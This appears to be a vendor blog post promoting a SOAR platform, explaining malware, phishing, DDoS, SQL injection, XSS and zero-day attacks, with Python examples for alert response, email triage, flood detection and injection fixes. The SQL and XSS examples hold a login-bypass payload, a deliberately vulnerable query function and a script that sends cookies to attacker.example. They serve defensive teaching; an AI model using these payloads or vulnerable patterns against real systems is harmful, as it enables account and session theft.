Common Cybersecurity Attacks Everyone Should Know About; Is your Organization Safe?
Some of the Most Common Cybersecurity Attacks that Could Derail your Organization & How Implementing a SOAR Solution Could be your Best Line of Defense
Cyber attacks are all too common, because the rapid expansion of the digital world has greatly increased the opportunities available to attackers. Organizations frequently fall victim to these attacks, sometimes without realizing it, potentially suffering irreparable damage and putting valuable assets at risk. A cyber attack is a malicious and deliberate attempt to gain unauthorized access to an individual’s or an organization’s system, network, or device. Attackers are more persistent than ever: many of them are well funded, sometimes even by nation-states, whether they run targeted attacks or mass campaigns. Having a working knowledge of the common types of cyber attacks is an important differentiator when determining how to prevent and recover from these threats.
Arguably the most common type of cyber attack is malware, a general term for malicious software, files, or programs intended to cause damage or to gain unauthorized access to a user’s account, computer, server, or network. Malware comes in many forms, including viruses, worms, spyware, trojan horses, and ransomware.
The attacker’s first goal is to get the malicious software onto a computer or network, either by exploiting a vulnerability or by tricking a user. There are countless ways to achieve this, but most of them require the user to take some action that installs the malware. This can be as simple as getting a user to click a dangerous link or to open an infected email attachment disguised as a harmless Word document or Excel spreadsheet.
Once inside the system, malware can take a wide variety of malicious actions: install additional malware, take control of the user’s computer, monitor the user’s actions and keystrokes, block access to data or a network (as ransomware does by encrypting files), collect confidential data from your machines or servers and transmit it to any destination the attacker chooses, or even render the computer completely inoperable.
Malware With CyberSponse’s CyOPs™ SOAR
CyberSponse’s SOAR solution can assist in the detection of malware and aid in recovery by automating the response process. For example, your organization’s Firepower IDS/IPS detects outbound command-and-control (C2) traffic to an external IP address and sends the alert to Splunk. Splunk forwards the alert to CyOPs™ via API, and CyOPs™ then takes the following actions: it instructs Carbon Black EDR to quarantine the host using the Carbon Black connector, instructs the Palo Alto firewall to block the IP address using the Palo Alto Panorama connector, and finally generates a malware incident case and assigns an investigation task to a SOC analyst. Automated containment steps like these should be gated by an allowlist of addresses that must never be blocked and by an approval step for business-critical hosts, so that a false positive does not turn into a self-inflicted outage. By automating this process with the CyOPs™ SOAR solution, incident response begins immediately, which is an important factor when the goal is to limit and prevent damage.
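The C2-alert response flow described above, written out as an added example in plain Python; this is not CyberSponse or CyOPs™ code. Connector calls are represented as an ordered action plan rather than executed, and the allowlist, the critical-host set, the action names and the sample alert are all assumptions constructed for the example, not any vendor’s API. The point it adds is the guardrails: internal and allowlisted addresses are never pushed to the firewall, and critical hosts get an approval step instead of automatic isolation.

```python
"""Added example (not CyberSponse/CyOPs code): an outbound-C2 alert turned
into an ordered containment plan with the guardrails a SOC wants before
letting automation quarantine hosts and push firewall blocks."""
import ipaddress
import json

# Ranges that must never be blocked at the perimeter: RFC 1918, loopback,
# link-local and multicast. (Python's is_private also flags the
# documentation ranges used in this example, so the list is explicit.)
INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4")]
# Assumed allowlist: e.g. the organisation's own public range and a public
# DNS resolver. Values are placeholders for the example.
NEVER_BLOCK = [ipaddress.ip_network("203.0.113.0/24"),
               ipaddress.ip_network("8.8.8.8/32")]
# Assumed set of hosts whose isolation needs a human decision first.
CRITICAL_HOSTS = {"dc01", "erp-db01"}


def is_blockable(ip_text):
    """True only for addresses outside the internal ranges and allowlist."""
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL + NEVER_BLOCK)


def build_response(alert_json):
    """Turn one alert (JSON text) into an ordered action plan.

    Mirrors the workflow in the text: isolate the host, block the C2
    address, then open a case and task an analyst. Each step is guarded so
    automation cannot block internal/allowlisted addresses or silently
    isolate a critical server. Action names are hypothetical."""
    alert = json.loads(alert_json)
    for key in ("src_host", "src_ip", "dest_ip", "signature"):
        if key not in alert:
            raise ValueError(f"alert missing required field {key!r}")

    actions = []
    host, dest = alert["src_host"], alert["dest_ip"]
    if host in CRITICAL_HOSTS:
        actions.append(("request_approval", f"quarantine {host}"))
    else:
        actions.append(("edr_quarantine_host", host))
    if is_blockable(dest):
        actions.append(("firewall_block_ip", dest))
    else:
        actions.append(("skip_block", f"{dest} is internal or allowlisted"))
    case = {
        "type": "malware",
        "severity": alert.get("severity", "medium"),
        "summary": f"{alert['signature']} from {host} ({alert['src_ip']}) to {dest}",
        "tasks": [{"assignee": "soc-analyst", "title": f"Investigate {host}"}],
    }
    actions.append(("create_case", case["summary"]))
    return {"actions": actions, "case": case}


# Constructed alert, shaped like an IDS alert forwarded by a SIEM.
SAMPLE_ALERT = json.dumps({
    "src_host": "ws-1042",
    "src_ip": "10.20.30.40",
    "dest_ip": "198.51.100.7",
    "signature": "MALWARE-CNC outbound beacon",
    "severity": "high",
})

if __name__ == "__main__":
    for action, target in build_response(SAMPLE_ALERT)["actions"]:
        print(f"{action:22} {target}")
```

Each tuple in the plan would map to one connector call in a real platform; keeping the plan as data first makes it easy to log what automation is about to do and to require a human click for the `request_approval` entries.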
Phishing is well known as the most successful method used by actors to introduce malware into a victim network. During reconnaissance, actors identify a particular company, or specific employees within it, to target. These targets are often selected by seniority or by their position within the company. For example, business executives may have access to sensitive corporate information an actor wants to exfiltrate; alternatively, an actor looking to gain a foothold in a network can target technical staff with elevated network privileges. Malware is delivered via phishing in many ways, including malicious links, weaponized business documents (PDF, DOC, XLS, etc.) and directly attached malicious EXE or ZIP files. Although these messages use many themes to entice the target into opening the file, they carry digital attributes (sender infrastructure, URLs, attachment hashes) that, once identified, can be blocked by security layers such as firewalls and email filtering tools.
Phishing With CyberSponse’s CyOPs™ SOAR
A typical phishing investigation in CyOPs™ is carried out by three chained playbooks. The first fetches emails and their metadata from a designated inbox and creates alert records from them, notifying the user that these emails are suspicious and should be investigated. The second takes these alerts and runs a phishing investigation with your preferred analysis tool. The third runs the same analysis on the email attachments, enriching the investigation and confirming whether the suspicious emails were indeed phishing.
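As an added example of the work the second and third playbooks hand to an analysis tool, the following Python triages one suspicious email: it parses the raw message, extracts the indicators described in the phishing section above (sender and Reply-To domains, URLs, attachment names and hashes) and returns a score with the reasons behind it. This is not CyOPs™ code; the message, the extension list and the scoring rules are constructed for the example.

```python
"""Added example, not CyberSponse/CyOPs code: indicator extraction and
scoring for one suspicious email, using only the standard library."""
import hashlib
import ipaddress
import re
from email import message_from_bytes, policy
from email.utils import parseaddr
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# Attachment types that commonly carry or fetch malware when mailed
# directly (assumed list for the example).
RISKY_EXTENSIONS = (".exe", ".scr", ".js", ".vbs", ".lnk", ".iso",
                    ".zip", ".docm", ".xlsm", ".pptm")


def address_domain(header_value):
    """Domain of the first address in a header, lowercased ('' if absent)."""
    _name, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def is_ip_host(url):
    """True when the URL's host is a bare IP address rather than a name."""
    try:
        ipaddress.ip_address(urlparse(url).hostname or "")
        return True
    except ValueError:
        return False


def triage_email(raw_message):
    """Parse one raw RFC 5322 message and return its indicators and score."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    from_domain = address_domain(msg["From"])
    reply_domain = address_domain(msg["Reply-To"])
    urls, attachments = set(), []
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            data = part.get_payload(decode=True) or b""
            name = (part.get_filename() or "").lower()
            attachments.append({
                "filename": name,
                "sha256": hashlib.sha256(data).hexdigest(),  # lookup key
                "risky": name.endswith(RISKY_EXTENSIONS),
            })
        elif part.get_content_type() in ("text/plain", "text/html"):
            urls.update(URL_RE.findall(part.get_content()))

    reasons = []
    if reply_domain and reply_domain != from_domain:
        reasons.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    for att in attachments:
        if att["risky"]:
            reasons.append(f"risky attachment type: {att['filename']}")
    for url in sorted(urls):
        if is_ip_host(url):
            reasons.append(f"URL with bare IP host: {url}")
    return {
        "from_domain": from_domain,
        "reply_to_domain": reply_domain,
        "urls": sorted(urls),
        "attachments": attachments,
        "score": len(reasons),
        "reasons": reasons,
    }


# Constructed message: invoice lure, mismatched Reply-To, IP-only link
# and a zip attachment (the base64 is a few bytes of a zip header).
SAMPLE_EML = b"""From: "Accounts Payable" <ap@example.com>
Reply-To: collections@evil-example.net
To: cfo@example.com
Subject: Overdue invoice - action required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please review the attached invoice or pay now at http://198.51.100.23/pay
--b1
Content-Type: application/zip; name="invoice.zip"
Content-Disposition: attachment; filename="invoice.zip"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAA==
--b1--
"""

if __name__ == "__main__":
    result = triage_email(SAMPLE_EML)
    print(result["score"], result["reasons"])
```

The SHA-256 of each attachment and the URL list are the values a later playbook would submit to a reputation service; the score is deliberately a plain count of reasons so an analyst can see exactly why an alert was raised.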
Denial of service (DoS or DDoS)
Denial of service attacks impact the availability of systems or networks by exhausting resources. If a website receives more network traffic than its architecture can process, legitimate users’ ability to reach it is reduced. This can happen under normal circumstances, for example on Black Friday when online shopping traffic peaks, but malicious actors can cause it deliberately. In a Distributed Denial of Service (DDoS) attack, the attacker hijacks network infrastructure around the world, typically a botnet of compromised devices, and uses it to send traffic floods at victim networks. Systems should be stress tested and protected with rate limiting and/or Content Delivery Networks (CDNs) and DDoS scrubbing services such as Amazon CloudFront or Akamai, so that DDoS attacks do not impact the site.
DDoS With CyberSponse’s CyOPs™ SOAR
For a DDoS attack, CyberSponse would establish communication with your preferred DDoS detection tool, and a playbook would create a CyOPs™ alert carrying the same metadata. The playbook can either be triggered instantly by an API request from an external tool with push functionality, or CyOPs™ can pull alerts on a set schedule. After the alert is created, investigation and remediation steps can start automatically, such as blocking the IP address that initiated the attack. Another option is for a Web Application Firewall to detect the flood and send the alert, after which CyOPs™ blocks the attacking IP addresses. Or, depending on organizational policy, CyOPs™ could instruct the firewall to block all inbound traffic to the targeted IP address (a blackhole route) so that the DDoS traffic does not degrade throughput across the rest of the network, at the cost of taking that one service offline. One caveat: blocking individual sources works against a single-source flood, but a distributed attack arrives from thousands of addresses, often spoofed, so the playbook usually has to push whole address lists or hand off to an upstream scrubbing provider or CDN. By automating this process with CyberSponse, an organization can configure and take the actions that meet its standard operating procedures and organizational policies for DDoS response and mitigation.
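The detection step that feeds the playbook above, and the rate-limiting idea from the DoS section, as an added example that is not CyberSponse or CyOPs™ code: a sliding-window request counter run over constructed web-server access-log lines. It reports sources whose request count in the window exceeds a limit, skipping an allowlist of internal ranges so monitoring hosts are never handed to the firewall. The log lines, thresholds and addresses are constructed for the example.

```python
"""Added example, not CyberSponse/CyOPs code: per-source flood detection
over access-log lines with a sliding time window."""
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common/combined log format: ip ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def detect_floods(lines, window_seconds=10, per_ip_limit=20, allowlist=()):
    """Return {ip: peak_requests_in_window} for sources over the limit.

    Each source keeps a deque of its request times; on every new request
    timestamps older than `window_seconds` are dropped, so the deque length
    is that source's request count in the trailing window. Windows are per
    source, so lines only need to be chronological per source."""
    allow_nets = [ipaddress.ip_network(n) for n in allowlist]
    recent = defaultdict(deque)   # ip -> timestamps inside the window
    flagged = {}                  # ip -> peak count seen in a window
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue              # not a log line we understand; skip it
        ip_text = m.group("ip")
        try:
            ip = ipaddress.ip_address(ip_text)
        except ValueError:
            continue              # garbage in the address field
        if any(ip in net for net in allow_nets):
            continue              # never report allowlisted sources
        ts = datetime.strptime(m.group("ts"), TS_FORMAT)
        window = recent[ip_text]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) > per_ip_limit:
            flagged[ip_text] = max(flagged.get(ip_text, 0), len(window))
    return flagged


def make_sample_log():
    """Constructed log: one source bursting 30 requests in 5 s, one normal
    visitor, and one internal monitoring host polling a health check."""
    base = datetime(2019, 6, 1, 12, 0, 0, tzinfo=timezone.utc)

    def entry(ip, offset, path):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FORMAT)
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512'

    lines = [entry("198.51.100.7", i / 6, "/login") for i in range(30)]
    lines += [entry("203.0.113.5", i * 2, "/") for i in range(5)]
    lines += [entry("10.0.0.5", i / 5, "/healthz") for i in range(25)]
    return lines


if __name__ == "__main__":
    print(detect_floods(make_sample_log(), allowlist=["10.0.0.0/8"]))
```

The same window logic, applied before a request is served instead of after it is logged, is a basic rate limiter. Note what it cannot see: a distributed flood can keep every single source under `per_ip_limit`, so the aggregate request rate and the upstream provider’s telemetry have to be watched as well.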
Structured Query Language (SQL) Injections
One of the most common attacks against web applications, Structured Query Language (SQL) injection, has the potential to enable unauthorized access to sensitive data. A SQL injection occurs when a malicious actor submits crafted data to a web application through an input the application passes into a database query, most commonly a text box meant for user input such as a username or password. The malicious text entered into the box changes the meaning of the query, causing the application to return information to the actor that it was never intended to return. An example would be a login form that collects a username and password for authentication but, when exploited by a SQL injection, returns the full list of usernames and password hashes (or the passwords themselves, if the application stores them in the clear). The actor now has a path to the accounts of all system users.
The primary defense against SQL injection is to never build queries by concatenating user input into SQL text: use parameterized queries (prepared statements) so the database treats the input strictly as data, and give the application’s database account only the privileges it needs. Escaping or rejecting special characters such as the single quote, the equals sign and the asterisk is at best a secondary measure and is easy to get wrong. Web applications should also be scanned and tested regularly to see whether they are susceptible to SQL injection.
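The login text box scenario above, as an added example built on an in-memory SQLite database; this is not code from the page’s author. `login_vulnerable` splices user input into the SQL string and is defeated by a classic injection payload, while `login_safe` uses a parameterized query and treats the same payload as an ordinary (non-existent) username. The table, its rows and the payload are constructed for the example.

```python
"""Added example: vulnerable string-built query beside its parameterized fix."""
import sqlite3


def setup_db():
    """Constructed users table: two accounts with placeholder password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-of-alice-pw"), ("bob", "hash-of-bob-pw")],
    )
    return conn


def login_vulnerable(conn, username, password_hash):
    """Vulnerable: input becomes part of the SQL text, so a quote and a
    comment marker typed by the user rewrite the WHERE clause."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'\n"
        "ORDER BY username"
    )
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password_hash):
    """Fixed: placeholders keep the input as data; the database never
    parses it as SQL, so the payload is just a username nobody has."""
    query = (
        "SELECT username FROM users "
        "WHERE username = ? AND password_hash = ?\n"
        "ORDER BY username"
    )
    return [row[0] for row in conn.execute(query, (username, password_hash))]


# Constructed payload: closes the username string, makes the condition
# always true, and comments out the password check to the end of the line.
PAYLOAD = "' OR 1=1 --"

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))  # every user
    print("safe:      ", login_safe(db, PAYLOAD, "wrong"))        # nobody
```

With the vulnerable function the query that actually reaches SQLite is `... WHERE username = '' OR 1=1 --' AND password_hash = 'wrong'`, which is why the password check silently disappears; escaping the quote would stop this one payload but not the next encoding trick, which is the reason to prefer placeholders.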
SQL Injections With CyberSponse’s CyOPs™ SOAR
Similar to DDoS attacks, SQL injections are detected by a WAF or an IDS/IPS. As soon as detection happens, a CyOPs™ playbook is triggered to create an alert with the necessary metadata, and follow-on response actions can again be performed automatically by a playbook, or an analyst can provide input during the process. For example, CyOPs™ could notify the website administrator by email that a SQL injection attempt was observed, recommending that the administrator review their logs to determine whether the attack succeeded. If the administrator reports that it did, a CyOPs™ playbook would generate an incident and create a task for the forensics team to investigate the web server in depth.
Cross Site Scripting (XSS)
Another common type of web application attack is Cross Site Scripting (XSS). Like a SQL injection attack, it targets the web application, but whereas a SQL injection aims to give the actor access to the data stored behind the application, an XSS attack targets the visitors of the website. The actor injects script into a page, either stored in the site’s content or reflected from a crafted link, and that script runs only when visitors browse to the page and their browsers execute it. The malicious code deployed during an XSS attack can cause loss of data for those victims: for example, any data the user sends to the website could be captured and retransmitted to infrastructure controlled by the actor. This could include credit card data, personal information, user credentials, or the session cookie that identifies the logged-in user.
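As an added example (not code from the page’s author), a comment widget that renders user-supplied text into a page. `render_vulnerable` interpolates the text raw, so a stored script runs in every visitor’s browser, exactly the capture-and-retransmit scenario described above. `render_safe` encodes text for the HTML context, and `safe_href` shows why encoding alone is not enough for a link attribute: a `javascript:` URL survives HTML escaping untouched, so the scheme has to be checked as well. The payload and the sample inputs are constructed for the example.

```python
"""Added example: raw HTML interpolation beside context-aware encoding."""
import html
from urllib.parse import urlparse


def render_vulnerable(author, text, link):
    """Vulnerable: raw interpolation into both a text node and an attribute."""
    return f'<p class="comment"><a href="{link}">{author}</a>: {text}</p>'


def safe_href(url):
    """Allow only http(s) links and encode the value for an attribute.

    html.escape would leave 'javascript:alert(1)' intact, so the scheme is
    checked first; anything else collapses to a harmless '#'."""
    cleaned = url.strip()
    if urlparse(cleaned).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def render_safe(author, text, link):
    """Fixed: text nodes are HTML-encoded, the link is scheme-checked and
    attribute-encoded, so browser input can no longer change the markup."""
    return (
        f'<p class="comment"><a href="{safe_href(link)}">{html.escape(author)}</a>: '
        f"{html.escape(text)}</p>"
    )


# Constructed stored-XSS payload: sends each visitor's cookies to the actor.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

if __name__ == "__main__":
    print(render_vulnerable("mallory", PAYLOAD, "javascript:alert(1)"))
    print(render_safe("mallory", PAYLOAD, "javascript:alert(1)"))
```

Output encoding is the fix for the vulnerability itself; a Content-Security-Policy header that disallows inline script and unknown origins is the safety net that limits what an encoding slip can still do.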
XSS With CyberSponse’s CyOPs™ SOAR
Detection is essential to limiting the impact of XSS attacks. CyberSponse can automate this process by integrating with your organization’s EDR or IDS: the tool detects the attack and sends an alert to CyOPs™, and CyOPs™ then uses a connector to instruct the web proxy to block the website. Blocking is containment only; the vulnerability itself is fixed in the application by encoding user-supplied output for the context it lands in.
Among the hardest cyber attacks to defend against are ‘zero-day’ attacks, because the defense depends entirely on timing and constant network monitoring. A zero-day exploits a vulnerability for which no patch or fix yet exists, sometimes one the vendor does not even know about. Even after a vulnerability is announced, there is a window before a patch is released, installed, or otherwise mitigated, and it is during that window that attackers target and exploit the vulnerability in an attempt to compromise the victim’s machine or network.
The best protection against zero-day attacks is to closely monitor the network, keep the attack surface small, and regularly perform infrastructure and network penetration testing. Identifying existing vulnerabilities and applying patches or workarounds as soon as they become available shrinks the window of exposure, which is the most effective way to limit the damage a zero-day can do.
Zero-Day With CyberSponse’s CyOPs™ SOAR
While preventing a zero-day attack is nearly impossible, the CyberSponse SOAR solution can expedite the response to this type of cyber attack. CyOPs™ can automate case management, creating and tracking tasks across teams (analysts, forensics, malware, firewall, etc.). Enriching indicators of compromise (IOCs) by integrating CyOPs™ with connectors for tools like DomainTools and VirusTotal can also assist in recovery. Creating custom playbooks in CyOPs™ for your IDS and IPS tools to automate this process will further reduce response time and close the vulnerability window.
Prevention & Recovery
Overall, practicing good cyber hygiene and being aware of the types of threats that exist can help prevent cyber attacks. Simple measures help protect your networks and systems: performing recurring backups (kept offline or otherwise isolated so ransomware cannot reach them), restricting each user’s access to what their role requires, using two-factor authentication wherever it is available, encrypting sensitive data, and enforcing a password policy with length requirements and checks against known-breached passwords. Mandatory time-based password changes are no longer recommended (NIST SP 800-63B advises against them), since they push users toward weaker, predictable passwords.
Additionally, we have only discussed several of the most common cyber attacks; with so many different types, it is important to consider all of the available resources that could benefit your particular environment. One type of resource that has recently taken the market by storm is the SOAR solution, such as the industry-leading CyberSponse CyOPs™ SOAR solution. A SOAR (Security Orchestration, Automation and Response) platform incorporates the tools your organization already uses and maximizes them by dramatically increasing their efficiency and effectiveness. CyberSponse offers the only patented security orchestration and automation incident response SOAR platform that fills the gap between automation-only and human-dependent security for organizations.
By implementing the CyberSponse CyOPs™ SOAR platform in your environment, analysts are able to evaluate threats efficiently because the collection of data from hundreds of enterprise security tools is automated. The raw log data collected and pre-processed by CyOPs™ SOAR is then presented to analysts in a concise, visual form, enabling near-real-time evaluation of an attacker’s progression through the attack lifecycle. In addition to presenting data to the analyst, the CyOPs™ SOAR platform documents this information as part of its incident management/case management functionality. This approach reduces alert fatigue and enables analysts to evaluate attack scenarios and security incidents efficiently, ensuring analytical outputs are available to all members of the team in real time.
Curious About Potentially Incorporating a SOAR Solution in your Organization’s Environment?
Try our FREE Community Edition for 45 Days, and See How CyOPs Can Streamline your Environment!
For a 60 Day FREE Trial of Community Edition, Write “Marketing” Under Referred & We’ll Give you an Additional 15-Day Extension!